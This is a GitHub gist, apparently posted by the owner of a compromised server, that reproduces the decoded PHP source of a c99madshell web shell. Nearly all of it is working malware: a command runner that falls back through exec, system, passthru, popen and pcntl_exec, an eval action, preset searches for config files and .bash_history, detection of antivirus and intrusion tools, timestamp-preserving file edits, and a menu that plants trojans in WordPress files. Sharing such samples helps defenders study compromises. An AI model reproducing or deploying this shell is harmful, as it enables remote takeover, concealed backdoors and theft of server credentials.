Last active
November 10, 2023 05:01
-
-
Save antimatter15/f40a4615c68eea373ad4 to your computer and use it in GitHub Desktop.
Decoded from my hacked server
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
ini_set('display_errors', 1); | |
ini_set('display_startup_errors', 1); | |
error_reporting(E_ALL); | |
//@ignore_user_abort(TRUE); | |
@set_time_limit(0); | |
@set_magic_quotes_runtime(0); | |
@ini_set('error_log',NULL); | |
@ini_set('log_errors',0); | |
@ini_set('max_execution_time',0); | |
$login = ""; //Login | |
$pass = ""; //Pass | |
$md5_pass = ""; //If no pass then hash | |
$allow_ext = array('mysql','mysqli','ftp','curl','imap','sockets','mssql','sqlite'); | |
$allow_program = array('gcc','cc','ld','php','perl','python','ruby','make','tar','nc','locate','suidperl','wget','get','fetch','links','lynx','curl','lwp-mirror','lwp-download'); | |
$allow_service = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','tripwire','sxid','logcheck','logwatch'); | |
@ob_start(); | |
@ob_implicit_flush(0); | |
function onphpshutdown() | |
{ | |
global $gzipencode,$ft; | |
$v = @ob_get_contents(); | |
@ob_end_clean(); | |
@ob_start("ob_gzHandler"); | |
echo $v; | |
@ob_end_flush(); | |
} | |
function which($which) { | |
$locate = myshellexec('which '.$which); | |
if($locate) { | |
return $locate; | |
} else { | |
return false; | |
} | |
} | |
function save_file($file, $content) { | |
global $win; | |
if(!file_exists($file)) { | |
return false; | |
} | |
clearstatcache(); | |
$filetime = filemtime($file); | |
if(!is_writable($file)) { | |
$fileperm = substr(decoct(fileperms($file)), -4, 4); | |
@chmod($file, intval(0777,8)); | |
if(!is_writable($file)) { | |
return false; | |
} | |
} | |
$handle = @fopen($file, 'w'); | |
if($handle === FALSE) { | |
return false; | |
} | |
fwrite($handle, $content); | |
fclose($handle); | |
@touch($file, $filetime, $filetime); | |
if(isset($fileperm) && !empty($fileperm)) { | |
@chmod($file, intval($fileperm,8)); | |
} | |
clearstatcache(); | |
return true; | |
} | |
function c99shexit() { | |
onphpshutdown(); | |
exit; | |
} | |
function RecursFile($dir) { | |
$files = array(); | |
if(substr($dir, -1) != DIRECTORY_SEPARATOR) { | |
$dir .= DIRECTORY_SEPARATOR; | |
} | |
if(!file_exists($dir)) { | |
return false; | |
} | |
clearstatcache(); // Чистим кеш | |
$realpath = getcwd(); // Сохраняем текущий путь | |
$handle = @opendir($dir); | |
if(FALSE === $handle) { | |
return false; | |
} | |
chdir($dir); | |
while(FALSE !== ($file = readdir($handle))) { | |
if('.' != $file && '..' != $file ) { | |
if(is_dir($file)) { | |
$recurs = RecursFile($dir.DIRECTORY_SEPARATOR.$file.DIRECTORY_SEPARATOR); | |
if(is_array($recurs)) { | |
$files = array_merge($files, $recurs); | |
} | |
} elseif(is_file($file)) { | |
$files[] = str_replace(array('\\\\', '//'), DIRECTORY_SEPARATOR, $dir.DIRECTORY_SEPARATOR.$file); | |
} | |
} | |
} | |
closedir($handle); | |
chdir($realpath); // Восстанавливаем путь | |
clearstatcache(); // Чистим кеш | |
//sort($files); | |
return $files; | |
} | |
/** | |
* Функция показывает рекурсивно все папки из заданной. | |
* | |
*/ | |
function RecursDir($dir) { | |
$dirs = array(); | |
if(substr($dir, -1) != DIRECTORY_SEPARATOR) { | |
$dir .= DIRECTORY_SEPARATOR; | |
} | |
if(!file_exists($dir)) { | |
return false; | |
} | |
clearstatcache(); // Чистим кеш | |
$realpath = getcwd(); // Сохраняем текущий путь | |
$handle = @opendir($dir); | |
if(FALSE === $handle) { | |
return false; | |
} | |
chdir($dir); | |
$dirs[] = str_replace(array('\\\\', '//'), DIRECTORY_SEPARATOR, $dir); | |
while(FALSE !== ($file = readdir($handle))) { | |
if('.' != $file && '..' != $file ) { | |
if(is_dir($file)) { | |
$dirs[] = str_replace(array('\\\\', '//'), DIRECTORY_SEPARATOR, $dir.DIRECTORY_SEPARATOR.$file.DIRECTORY_SEPARATOR); | |
$recurs = RecursDir($dir.DIRECTORY_SEPARATOR.$file.DIRECTORY_SEPARATOR); | |
if(is_array($recurs)) { | |
$dirs = array_merge($dirs, $recurs); | |
} | |
} | |
} | |
} | |
closedir($handle); | |
chdir($realpath); // Восстанавливаем путь | |
clearstatcache(); // Чистим кеш | |
$dirs = array_unique($dirs); | |
return $dirs; | |
} | |
function setRecursPerm($dir, $perm) { | |
$good = 0; | |
$bad = 0; | |
$all = array_merge(RecursFile($dir), RecursDir($dir)); | |
foreach($all as $file) { | |
if(@chmod($file, $perm)) { | |
$good++; | |
} else { | |
$bad++; | |
} | |
} | |
return $good.':'.$bad; | |
} | |
$win = strtolower(substr(PHP_OS,0,3)) == "win"; | |
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} | |
$_REQUEST = array_merge($_COOKIE,$_POST); | |
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} | |
$shver = "3.0 BLOG edition"; | |
if (empty($surl)){ | |
$surl = $_SERVER['PHP_SELF']; | |
} | |
$surl = htmlspecialchars($surl); | |
$timelimit = 0; | |
$login_txt = "Admin area"; | |
$accessdeniedmess = "<a href=\"http://securityprobe.net\">c99madkibshell v.".$shver."</a>: access denied"; | |
$filestealth = TRUE; | |
$curdir = "./"; | |
$tmpdir = ""; | |
$tmpdir_log = "./"; | |
$sort_default = "0a"; | |
$sort_save = TRUE; | |
$safemode_diskettes = array('a'); | |
$hexdump_lines = 8; | |
$hexdump_rows = 24; | |
$nixpwdperpage = 100; | |
if (!$win) { | |
$cmdaliases = array( | |
array("-----------------------------------------------------------", "ls -la"), | |
array("find config.inc.php files", "find / -type f -name config.inc.php"), | |
array("find config* files", "find / -type f -name \"config*\""), | |
array("find config* files in current dir", "find . -type f -name \"config*\""), | |
array("find all writable folders and files", "find / -perm -2 -ls"), | |
array("find all writable folders and files in current dir", "find . -perm -2 -ls"), | |
array("find all .bash_history files", "find / -type f -name .bash_history"), | |
array("find .bash_history files in current dir", "find . -type f -name .bash_history"), | |
array("show opened ports", "netstat -an | grep -i listen") | |
); | |
} else { | |
$cmdaliases = array( | |
array("-----------------------------------------------------------", "dir"), | |
array("show opened ports", "netstat -an") | |
); | |
} | |
$quicklaunch = array( | |
array("<b><hr>Search</b>","#\" onclick=\"document.todo.act.value='search';document.todo.d.value='%d';document.todo.submit();"), | |
array("<b>PHP-code</b>","#\" onclick=\"document.todo.act.value='eval';document.todo.d.value='%d';document.todo.submit();"), | |
array("<b>Self remove</b>","#\" onclick=\"document.todo.act.value='selfremove';document.todo.submit();"), | |
); | |
$highlight_background = "#c0c0c0"; | |
$highlight_bg = "#FFFFFF"; | |
$highlight_comment = "#6A6A6A"; | |
$highlight_default = "#0000BB"; | |
$highlight_html = "#1300FF"; | |
$highlight_keyword = "#007700"; | |
$highlight_string = "#000000"; | |
@$f = $_REQUEST["f"]; | |
@extract($_REQUEST["c99shcook"]); | |
if (!empty($login)) | |
{ | |
if (empty($md5_pass)) {$md5_pass = md5($pass);} | |
if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) | |
{ | |
if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |<br>"," ",$donated_html));} | |
header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); | |
header("HTTP/1.0 401 Unauthorized"); | |
c99shexit($accessdeniedmess); | |
} | |
} | |
if (isset($_POST['act'])) $act = $_POST['act']; | |
if (isset($_POST['d'])) $d = urldecode($_POST['d']); else $d=getcwd(); | |
if (isset($_POST['sort'])) $sort = $_POST['sort']; | |
if (isset($_POST['f'])) $f = urldecode($_POST['f']); | |
if (isset($_POST['ft'])) $ft = $_POST['ft']; | |
if (isset($_POST['grep'])) $grep = $_POST['grep']; | |
if (isset($_POST['processes_sort'])) $processes_sort = $_POST['processes_sort']; | |
if (isset($_POST['pid'])) $pid = $_POST['pid']; | |
if (isset($_POST['sig'])) $sig = $_POST['sig']; | |
if (isset($_POST['base64'])) $base64 = $_POST['base64']; | |
if (isset($_POST['fullhexdump'])) $fullhexdump = $_POST['fullhexdump']; | |
if (isset($_POST['c'])) $c = $_POST['c']; | |
if (isset($_POST['white'])) $white = $_POST['white']; | |
if (isset($_POST['nixpasswd'])) $nixpasswd = $_POST['nixpasswd']; | |
$lastdir = @realpath("."); | |
@chdir($curdir); | |
$disablefunc = @ini_get("disable_functions"); | |
if (!empty($disablefunc)) | |
{ | |
$disablefunc = str_replace(" ","",$disablefunc); | |
$disablefunc = explode(",",$disablefunc); | |
} else { | |
$disablefunc = array(); | |
} | |
function str2mini($content,$len) | |
{ | |
if (strlen($content) > $len) | |
{ | |
$len = ceil($len/2) - 2; | |
return substr($content, 0,$len)."...".substr($content,-$len); | |
} | |
else {return $content;} | |
} | |
function listdir($start_dir='.') { | |
$files = array(); | |
if (is_dir($start_dir)) { | |
$fh = opendir($start_dir); | |
while (($file = readdir($fh)) !== false) { | |
# loop through the files, skipping . and .., and recursing if necessary | |
if (strcmp($file, '.')==0 || strcmp($file, '..')==0) continue; | |
$filepath = $start_dir . '/' . $file; | |
if ( is_dir($filepath) ) | |
$files = array_merge($files, listdir($filepath)); | |
else | |
array_push($files, $filepath); | |
} | |
closedir($fh); | |
} else { | |
# false if the function was called with an invalid non-directory argument | |
$files = false; | |
} | |
return $files; | |
} | |
function view_size($size) | |
{ | |
if (!is_numeric($size)) {return FALSE;} | |
else | |
{ | |
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} | |
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} | |
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} | |
else {$size = $size . " B";} | |
return $size; | |
} | |
} | |
function fs_rmdir($d) | |
{ | |
$h = opendir($d); | |
while (($o = readdir($h)) !== FALSE) | |
{ | |
if (($o != ".") and ($o != "..")) | |
{ | |
if (!is_dir($d.$o)) {unlink($d.$o);} | |
else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} | |
} | |
} | |
closedir($h); | |
rmdir($d); | |
return !is_dir($d); | |
} | |
function fs_rmobj($o) | |
{ | |
$o = str_replace("\\",DIRECTORY_SEPARATOR,$o); | |
if (is_dir($o)) | |
{ | |
if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} | |
return fs_rmdir($o); | |
} | |
elseif (is_file($o)) {return unlink($o);} | |
else {return FALSE;} | |
} | |
function myshellexec($cfe) | |
{ | |
$res = ''; | |
if (!empty($cfe)) | |
{ | |
if(@function_exists('exec')) | |
{ | |
@exec($cfe,$res); | |
$res = join("\n",$res); | |
} | |
elseif(@function_exists('shell_exec')) | |
{ | |
$res = @shell_exec($cfe); | |
} | |
elseif(@function_exists('system')) | |
{ | |
@ob_start(); | |
@system($cfe); | |
$res = @ob_get_contents(); | |
@ob_end_clean(); | |
} | |
elseif(@function_exists('passthru')) | |
{ | |
@ob_start(); | |
@passthru($cfe); | |
$res = @ob_get_contents(); | |
@ob_end_clean(); | |
} | |
elseif(@is_resource($f = @popen($cfe,"r"))) | |
{ | |
$res = ""; | |
if(@function_exists('fread') && @function_exists('feof')){ | |
while(!@feof($f)) { $res .= @fread($f,1024); } | |
}else if(@function_exists('fgets') && @function_exists('feof')){ | |
while(!@feof($f)) { $res .= @fgets($f,1024); } | |
} | |
@pclose($f); | |
} | |
elseif(@is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes))) | |
{ | |
$res = ""; | |
if(@function_exists('fread') && @function_exists('feof')){ | |
while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);} | |
}else if(@function_exists('fgets') && @function_exists('feof')){ | |
while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);} | |
} | |
@proc_close($f); | |
} | |
elseif(@function_exists('pcntl_exec')&&@function_exists('pcntl_fork')) | |
{ | |
$res = '[~] Blind Command Execution via [pcntl_exec]\n\n'; | |
$pid = @pcntl_fork(); | |
if ($pid == -1) { | |
$res .= '[-] Could not children fork. c99shexit'; | |
} else if ($pid) { | |
if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';} | |
else {$res .= '[-] Error. Command incorrect.';} | |
} else { | |
$cfe = array(" -e 'system(\"$cfe\")'"); | |
if(@pcntl_exec('/usr/bin/perl',$cfe)) c99shexit(0); | |
if(@pcntl_exec('/usr/local/bin/perl',$cfe)) c99shexit(0); | |
die(); | |
} | |
} | |
} | |
return $res; | |
} | |
function tabsort($a,$b) | |
{ | |
global $v; | |
return strnatcmp($a[$v], $b[$v]); | |
} | |
function view_perms($mode) | |
{ | |
if (($mode & 0xC000) === 0xC000) {$type = "s";} | |
elseif (($mode & 0x4000) === 0x4000) {$type = "d";} | |
elseif (($mode & 0xA000) === 0xA000) {$type = "l";} | |
elseif (($mode & 0x8000) === 0x8000) {$type = "-";} | |
elseif (($mode & 0x6000) === 0x6000) {$type = "b";} | |
elseif (($mode & 0x2000) === 0x2000) {$type = "c";} | |
elseif (($mode & 0x1000) === 0x1000) {$type = "p";} | |
else {$type = "?";} | |
$owner["read"] = ($mode & 00400)?"r":"-"; | |
$owner["write"] = ($mode & 00200)?"w":"-"; | |
$owner["execute"] = ($mode & 00100)?"x":"-"; | |
$group["read"] = ($mode & 00040)?"r":"-"; | |
$group["write"] = ($mode & 00020)?"w":"-"; | |
$group["execute"] = ($mode & 00010)?"x":"-"; | |
$world["read"] = ($mode & 00004)?"r":"-"; | |
$world["write"] = ($mode & 00002)? "w":"-"; | |
$world["execute"] = ($mode & 00001)?"x":"-"; | |
if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} | |
if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} | |
if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} | |
return $type.join("",$owner).join("",$group).join("",$world); | |
} | |
if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} | |
if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} | |
if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} | |
if (!function_exists("parse_perms")) | |
{ | |
function parse_perms($mode) | |
{ | |
if (($mode & 0xC000) === 0xC000) {$t = "s";} | |
elseif (($mode & 0x4000) === 0x4000) {$t = "d";} | |
elseif (($mode & 0xA000) === 0xA000) {$t = "l";} | |
elseif (($mode & 0x8000) === 0x8000) {$t = "-";} | |
elseif (($mode & 0x6000) === 0x6000) {$t = "b";} | |
elseif (($mode & 0x2000) === 0x2000) {$t = "c";} | |
elseif (($mode & 0x1000) === 0x1000) {$t = "p";} | |
else {$t = "?";} | |
$o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; | |
$g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; | |
$w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; | |
return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); | |
} | |
} | |
function parsesort($sort) | |
{ | |
$one = intval($sort); | |
$second = substr($sort,-1); | |
if ($second != "d") {$second = "a";} | |
return array($one,$second); | |
} | |
function view_perms_color($o) | |
{ | |
if (!@is_readable($o)) {return "<font color=red>".view_perms(@fileperms($o))."</font>";} | |
elseif (!@is_writable($o)) {return "<font color=white>".view_perms(@fileperms($o))."</font>";} | |
else {return "<font color=green>".view_perms(@fileperms($o))."</font>";} | |
} | |
function c99fsearch($d) | |
{ | |
global $found; | |
global $found_d; | |
global $found_f; | |
global $search_i_f; | |
global $search_i_d; | |
global $a; | |
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | |
$h = opendir($d); | |
while (($f = readdir($h)) !== FALSE) | |
{ | |
if($f != "." && $f != "..") | |
{ | |
$bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); | |
if (is_dir($d.$f)) | |
{ | |
$search_i_d++; | |
if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} | |
if (!is_link($d.$f)) {c99fsearch($d.$f);} | |
} | |
else | |
{ | |
$search_i_f++; | |
if ($bool) | |
{ | |
if (!empty($a["text"])) | |
{ | |
$r = @file_get_contents($d.$f); | |
if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} | |
if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} | |
if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} | |
else {$bool = strpos(" ".$r,$a["text"],1);} | |
if ($a["text_not"]) {$bool = !$bool;} | |
if ($bool) {$found[] = $d.$f; $found_f++;} | |
} | |
else {$found[] = $d.$f; $found_f++;} | |
} | |
} | |
} | |
} | |
closedir($h); | |
} | |
if(!isset($act)) {$act='';} | |
if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} | |
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); | |
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); | |
header("Cache-Control: no-store, no-cache, must-revalidate"); | |
header("Cache-Control: post-check=0, pre-check=0", FALSE); | |
header("Pragma: no-cache"); | |
if (empty($tmpdir)) | |
{ | |
$tmpdir = ini_get("upload_tmp_dir"); | |
if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} | |
} | |
$tmpdir = realpath($tmpdir); | |
$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); | |
if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} | |
if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} | |
else {$tmpdir_logs = realpath($tmpdir_logs);} | |
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") | |
{ | |
$safemode = TRUE; | |
$hsafemode = "<font color=red>ON (secure)</font>"; | |
} | |
else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} | |
$v = @ini_get("open_basedir"); | |
if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} | |
else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} | |
$sort = @htmlspecialchars($sort); | |
if (empty($sort)) {$sort = $sort_default;} | |
$sort[1] = strtolower($sort[1]); | |
$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),'',getenv("SERVER_SOFTWARE")); | |
@ini_set("highlight.bg",$highlight_bg); //FFFFFF | |
@ini_set("highlight.comment",$highlight_comment); //#FF8000 | |
@ini_set("highlight.default",$highlight_default); //#0000BB | |
@ini_set("highlight.html",$highlight_html); //#000000 | |
@ini_set("highlight.keyword",$highlight_keyword); //#007700 | |
@ini_set("highlight.string",$highlight_string); //#DD0000 | |
if (!isset($actbox) || !is_array($actbox)) {$actbox = array();} | |
$dspact = $act = htmlspecialchars($act); | |
$disp_fullpath = $ls_arr = $notls = null; | |
$ud = urlencode($d); | |
?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99madshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><form name='todo' method='POST'><input name='act' type='hidden' value=''><input name='grep' type='hidden' value=''><input name='fullhexdump' type='hidden' value=''><input name='base64' type='hidden' value=''><input name='nixpasswd' type='hidden' value=''><input name='pid' type='hidden' value=''><input name='c' type='hidden' value=''><input name='white' type='hidden' value=''><input name='wp_act' type='hidden' value=''><input name='wp_path' type='hidden' value='<?php if(isset($wp_path)) echo($wp_path);?>'><input name='sig' type='hidden' value=''><input name='processes_sort' type='hidden' value=''><input name='d' type='hidden' value=''><input name='sort' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''></form><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99madShell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr> | |
<tr><td> | |
<p align="left"><b>Software: <?php echo $DISP_SERVER_SOFTWARE; ?></b> </p> | |
<p align="left"><b>System: <?php echo substr(php_uname(),0,90); ?></b> </p> | |
<?php | |
if(!$win && function_exists('posix_getgrgid') && function_exists('posix_getegid')) { | |
echo('<p align="left"><b>User/Group: '); | |
$groupinfo = posix_getgrgid(posix_getegid()); | |
echo(get_current_user().'/'.$groupinfo['name']); | |
echo('</b> </p>'); | |
} | |
?> | |
<p align="left"><b>Php version: <a href="#" onclick="document.todo.act.value='phpinfo';document.todo.submit();"><b><u><?php echo(phpversion()) ?></u></b></a> | |
<p align="left"><b>Php modules: | |
<?php | |
$cur_ext = get_loaded_extensions(); | |
echo('<font title="'.implode(',', $cur_ext).'">'); | |
$intersect = array_intersect($allow_ext, $cur_ext); | |
echo(implode(', ', $intersect)); | |
?> | |
</font></b> </p> | |
<?php | |
if($disablefunc) { | |
echo('<p align="left" style="color:red"><b>Disable functions: '.implode(', ', $disablefunc).'</b></p>'); | |
} | |
if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) { | |
echo('<p align="left" style="color:red"><b>Mod Security: YES</b></p>'); | |
} | |
if(!$win && $safemode === FALSE) { | |
$pro = array(); | |
$ser = array(); | |
foreach($allow_program as $program) { | |
if($locate = which($program)) { | |
$pro[] = '<font title="'.$locate.'">'.$program.'</font>'; | |
} | |
} | |
foreach($allow_service as $service) { | |
if($locate = which($service)) { | |
$ser[] = '<font title="'.$locate.'">'.$service.'</font>'; | |
} | |
} | |
if($pro) { | |
echo('<p align="left"><b>Install program: <font color="#00CCFF">'.implode(', ', $pro).'</font></b></p>'); | |
} | |
if($ser) { | |
echo('<p align="left"><b>Install service: '.implode(', ', $ser).'</b></p>'); | |
} | |
} | |
?> | |
<p align="left"><b>Allow_url_fopen: <?php echo((@ini_get('allow_url_fopen'))==1?'<font color="green">ON</font>':'<font color="red">OFF</font>'); ?></b></p> | |
<p align="left"><b>Allow_url_include: <?php echo((@ini_get('allow_url_include'))==1?'<font color="green">ON</font>':'<font color="red">OFF</font>'); ?></b></p> | |
<p align="left"><b>Safe-mode: <?php echo $hsafemode; ?></b></p> | |
<?php | |
if(isset($wp_path)) { | |
if(valid_wp_path($wp_path)) { | |
draw_patch(); | |
draw_trojan(); | |
} else { | |
unset($wp_path); | |
} | |
} | |
if(!isset($wp_path)) { | |
$wp_path = found_wp(); | |
if(valid_wp_path($wp_path)) { | |
draw_patch(); | |
draw_trojan(); | |
} else { | |
unset($wp_path); | |
} | |
} | |
if(!isset($wp_path)) { | |
echo('<p><font color=red>Wordpress Not Found! '); | |
echo('<input type=text id="wp_pat"><input type="submit" value="SET PATH" onclick="document.todo.act.value=\'ls\';document.todo.wp_path.value=document.getElementById(\'wp_pat\').value;document.todo.submit();"></p>'); | |
} | |
function draw_trojan() { | |
echo('<p><font color=green>Trojan: </font> | |
<input type="submit" id="index" value="index" style="font-size: 6pt;'.get_style('index').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'index\';document.todo.submit();"/> | |
<input type="submit" id="wp-blog-header" value="wp-blog-header" style="font-size: 6pt;'.get_style('wp-blog-header').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'wp-blog-header\';document.todo.submit();"/> | |
<input type="submit" id="wp-config" value="wp-config" style="font-size: 6pt;'.get_style('wp-config').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'wp-config\';document.todo.submit();"/> | |
<input type="submit" id="wp-settings" value="wp-settings" style="font-size: 6pt;'.get_style('wp-settings').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'wp-settings\';document.todo.submit();"/> | |
<input type="submit" id="template-loader" value="template-loader" style="font-size: 6pt;'.get_style('template-loader').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'template-loader\';document.todo.submit();"/> | |
<input type="submit" id="template" value="template" style="font-size: 6pt;'.get_style('template').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'template\';document.todo.submit();"/></p>'); | |
} | |
function draw_patch() { | |
echo('<p><font color=green>Patch: </font> | |
<input type="submit" id="xmlrpc1" value="xmlrpc1" style="font-size: 6pt;'.get_style('xmlrpc1').' onclick="document.todo.act.value=\'patch\';document.todo.wp_act.value=\'xmlrpc1\';document.todo.submit();"/> | |
<input type="submit" id="xmlrpc2" value="xmlrpc2" style="font-size: 6pt;'.get_style('xmlrpc2').' onclick="document.todo.act.value=\'patch\';document.todo.wp_act.value=\'xmlrpc2\';document.todo.submit();"/> | |
<input type="submit" id="admin_ajax" value="admin_ajax" style="font-size: 6pt;'.get_style('admin_ajax').' onclick="document.todo.act.value=\'patch\';document.todo.wp_act.value=\'admin_ajax\';document.todo.submit();"/> | |
<input type="submit" id="blog_name_sql" value="blog_name_sql" style="font-size: 6pt;'.get_style('blog_name_sql').' onclick="document.todo.act.value=\'patch\';document.todo.wp_act.value=\'blog_name_sql\';document.todo.submit();"/> | |
<input type="submit" id="tb_id" value="tb_id" style="font-size: 6pt;'.get_style('tb_id').' onclick="document.todo.act.value=\'patch\';document.todo.wp_act.value=\'tb_id\';document.todo.submit();"/></p>'); | |
} | |
function found_wp() { | |
$path = @getcwd(); | |
if($path === false) { | |
return false; | |
} | |
if(valid_wp_path($path)) { | |
return $path; | |
} | |
if(preg_match('%(wp-(\w+)$)%i', $path, $ret)) { | |
$path = substr($path, 0, strpos($path, $ret[0])); | |
return $path; | |
} | |
if(preg_match('%(blog|wp|wordpress|blogs)%i', $path, $ret)) { | |
$path = substr($path, 0, strpos($path, $ret[0])+strlen($ret[0])+1); | |
return $path; | |
} | |
return false; | |
} | |
function valid_wp_path($path) { | |
if($path === false) { | |
return false; | |
} | |
if(file_exists($path.'wp-config.php')) { | |
return true; | |
} else { | |
return false; | |
} | |
} | |
function get_style($vuln) { | |
global $wp_path; | |
switch($vuln) { | |
case 'xmlrpc1': | |
case 'xmlrpc2': $file = $wp_path.'xmlrpc.php'; break; | |
case 'admin_ajax': $file = file_exists($wp_path.'wp-includes/pluggable.php')?$wp_path.'wp-includes/pluggable.php':$wp_path.'wp-includes/pluggable-functions.php'; break; | |
